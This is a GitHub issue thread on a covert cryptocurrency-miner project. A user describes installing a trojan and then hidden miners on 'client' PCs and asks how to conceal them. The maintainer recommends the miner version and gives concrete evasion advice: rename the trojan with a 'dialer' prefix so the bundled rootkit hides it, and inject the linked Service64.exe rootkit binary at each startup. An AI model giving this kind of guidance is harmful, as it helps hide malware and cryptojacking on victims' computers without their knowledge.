### ISSUE TITLE
tell me a perfect answere please

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#1989]
previously i used 3.1.1 builder work well but you released new 3.4.0
but i used 3.4.0 but it's some times going to hashrate are 0 

i have 02 miner in my client pc 3.1.1 and 3.4.0 but i pused 3.1.1 but hashrate are zero ?

actually tell me wich version better for at this moment ?

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/38198d93-7748-49cb-be3a-2e028fc1a575)

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/f3f433a2-9d7f-4194-a701-a3e58a560a80)

**Comment by UnamSanctam** [comment]
3.4.0 should be better, an Intel® Core™ i3-6006U is a low-end 2 core processor (and most likely the RAM is on the low side as well) so it being at 0 H/s wouldn't really be very surprising.

**Comment by DARK-DEVIL-66** [comment]
or it's only for 3.1.1 ?

**Comment by UnamSanctam** [comment]
Yes that one is updated for 3.4.0.

**Comment by DARK-DEVIL-66** [comment]
how to use the root kit for trojen

ex:trojen name is  Services.exe

how to hide Services.exe (idon't have source code for modification)
like your miner ?

**Comment by UnamSanctam** [comment]
Either build your own version of the rootkit from here: https://github.com/bytecode77/r77-rootkit. Or you can add the name `dialer` at the front of your trojan name.

**Comment by DARK-DEVIL-66** [comment]
you mean dialerservices.exe   it's rigth ?

(this step is reqiure before installed miners)

**Comment by UnamSanctam** [comment]
Yes that would work.

**Comment by DARK-DEVIL-66** [comment]
actually 1st i install trojen in my client pc after 02/03 days i install miners it's safe for my projects

so can i have chance to hide miner using rootkit ?

and i can't untasand this

https://github.com/bytecode77/r77-rootkit


do you kno any simple way ?

**Comment by DARK-DEVIL-66** [comment]
https://github.com/UnamSanctam/SilentCryptoMiner/raw/master/SilentCryptoMiner/Resources/Rootkit/Service64.exe

can i use for dialerservices.exe

**Comment by UnamSanctam** [comment]
Yes that would work fine but if you want to hide the trojan without the miner being installed (if I understand correctly) then you'll have to manually inject Service64.exe (the rootkit) on every start of the computer.
